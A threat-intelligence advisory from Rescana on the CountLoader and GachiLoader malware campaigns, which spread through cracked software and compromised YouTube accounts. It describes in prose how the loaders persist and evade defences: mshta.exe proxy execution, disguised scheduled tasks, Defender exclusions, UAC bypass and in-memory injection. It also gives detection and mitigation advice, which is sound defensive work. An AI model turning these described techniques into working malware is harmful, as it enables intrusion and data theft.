Executive Summary

A new wave of cyberattacks is exploiting the popularity of cracked software and the reach of YouTube to distribute two highly sophisticated malware loaders: CountLoader and GachiLoader. These loaders are engineered to deliver a variety of secondary payloads, including advanced information stealers and remote access tools, while employing advanced evasion techniques such as fileless execution, signed binary proxy abuse, and novel process injection. The campaign is notable for its technical depth, its use of social engineering, and its ability to propagate through both digital and physical vectors, including removable media. The threat is opportunistic, targeting any Windows system where users are lured into executing malicious files, and poses a significant risk to both individuals and organizations.

Threat Actor Profile

The operators behind the CountLoader and GachiLoader campaigns have not been definitively attributed to any known Advanced Persistent Threat (APT) group. Analysis of their tactics, techniques, and procedures (TTPs) suggests a financially motivated cybercrime group rather than a state-sponsored actor. The campaign leverages a broad, opportunistic targeting model, focusing on users seeking pirated software and exploiting compromised YouTube accounts to maximize reach. The technical sophistication of the malware, including anti-analysis features, advanced persistence mechanisms, and the use of legitimate binaries for execution, indicates a well-resourced and experienced threat actor. The group demonstrates a strong understanding of both social engineering and endpoint security evasion, and is capable of rapidly adapting its infrastructure and payloads in response to detection.

Technical Analysis of Malware/TTPs

CountLoader

CountLoader is typically delivered via cracked software sites. The infection chain begins when a user downloads a ZIP archive from a file-sharing service such as MediaFire. The archive contains an encrypted ZIP file, a Microsoft Word document with the decryption password, and a renamed legitimate Python interpreter (Setup.exe). Upon execution, the Python interpreter is configured to run a malicious command that retrieves the CountLoader payload from a remote server using mshta.exe, a signed Windows binary often abused for proxy execution.

Persistence is established through a scheduled task named GoogleTaskSystem136.0.7023.12, set to execute every 30 minutes for a decade. The loader checks for the presence of CrowdStrike Falcon via WMI queries and modifies its behavior if detected, demonstrating anti-analysis awareness. CountLoader can download and execute EXEs, DLLs (via rundll32.exe), MSI installers, or Python modules, and is capable of removing its own scheduled tasks to evade forensic analysis. It collects and exfiltrates system information and propagates via USB drives by creating malicious LNK shortcuts that mimic legitimate files. The loader employs fileless execution through mshta.exe or PowerShell, making detection by traditional antivirus solutions challenging.

The final payload is often ACR Stealer, but observed secondary payloads include Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The campaign has been active since at least June 2025, with infections spreading through warez forums, cracked software aggregators, and removable media.

GachiLoader

GachiLoader is distributed via a network of compromised YouTube accounts, referred to as the "YouTube Ghost Network." These accounts upload videos containing links to malicious installers, with over 100 flagged videos and approximately 220,000 views as of late 2025. The loader itself is a heavily obfuscated Node.js application, delivered as a JavaScript file.

Upon execution, GachiLoader performs several anti-analysis checks, including verifying administrative privileges using the net session command, attempting User Account Control (UAC) bypass, terminating SecHealthUI.exe (the Microsoft Defender user interface), and adding Defender exclusions for C:\Users\, C:\ProgramData\, and C:\Windows\. The loader fetches secondary payloads from remote URLs and uses a module named kidkadi.node to perform advanced PE injection via vectored exception handling, a technique that allows for stealthy, in-memory execution of malicious code.

Observed secondary payloads include Rhadamanthys (an information stealer) and Kidkadi (a custom PE injector). The loader's use of fileless, in-memory execution, combined with anti-AV and anti-analysis features, makes it highly evasive. The campaign leverages the trust and reach of YouTube, with malicious links placed in video descriptions and comments, and is capable of rapid propagation through social engineering.

MITRE ATT&CK Mapping

Both CountLoader and GachiLoader employ a range of MITRE ATT&CK techniques, including T1189 (Drive-by Compromise), T1195 (Supply Chain Compromise), T1059.001 (PowerShell), T1218.005 (Mshta), T1053.005 (Scheduled Task), T1218 (Signed Binary Proxy Execution), T1027 (Obfuscated Files or Information), T1091 (Replication via Removable Media), T1005 (Data from Local System), and T1041 (Exfiltration Over C2 Channel). GachiLoader additionally uses T1059.007 (JavaScript), T1218.011 (Rundll32), T1548.002 (Bypass User Account Control), and T1562.001 (Impair Defenses: Disable or Modify Tools).

Exploitation in the Wild

The campaign is widespread, with infections reported globally. The primary victims are individuals seeking pirated software, but organizations are also at risk, particularly through the use of infected removable media. The "YouTube Ghost Network" has enabled the rapid dissemination of GachiLoader, with hundreds of thousands of potential exposures. While no major public breaches have been directly attributed to these loaders, security vendors including Cyderes, Check Point, and Fortinet have reported widespread infections and significant data theft. The campaign's opportunistic nature and use of social engineering make it a persistent threat to both consumers and enterprises.

Victimology and Targeting

The targeting is indiscriminate, focusing on users who download cracked software or follow YouTube links to external installers. There is no evidence of sector-specific or country-specific targeting. However, the use of removable media as a propagation vector increases the risk of lateral movement within organizational environments, especially where endpoint controls are weak or user awareness is low. The campaign's reliance on social engineering and user behavior underscores the importance of security awareness and robust endpoint protection.

Mitigation and Countermeasures

Organizations and individuals can reduce their risk of infection from CountLoader and GachiLoader by implementing the following countermeasures. Block the execution of mshta.exe and rundll32.exe from user directories using application control policies. Monitor for the creation of suspicious scheduled tasks, particularly those with names mimicking legitimate services such as GoogleTaskSystem136.0.7023.12 or those set to run at high frequency. Audit all removable media for the presence of malicious LNK files, and restrict the use of USB drives where possible. Monitor for unauthorized changes to Microsoft Defender settings, including the addition of exclusions for critical directories and the termination of SecHealthUI.exe. Block known command-and-control (C2) domains and URLs associated with CountLoader and GachiLoader as published in vendor threat intelligence reports. Educate users about the risks of downloading cracked software and following links from untrusted YouTube videos, emphasizing the dangers of social engineering and the importance of verifying the legitimacy of software sources. Employ advanced endpoint detection and response (EDR) solutions capable of detecting fileless and in-memory attacks, and ensure that all systems are regularly updated and patched.

References

The Hacker News: Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware Check Point Research: GachiLoader Node.js Malware with API Tracing Cyderes Threat Intelligence: cyderes.com Fortinet CountLoader Analysis: fortinet.com/blog/threat-research Silent Push CountLoader Report: silentpush.com MITRE ATT&CK Framework: attack.mitre.org

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to help organizations stay ahead of emerging threats and ensure the resilience of their business ecosystem. For more information about how Rescana can help you strengthen your cyber defense posture, or for any questions regarding this advisory, please contact us at ops@rescana.com.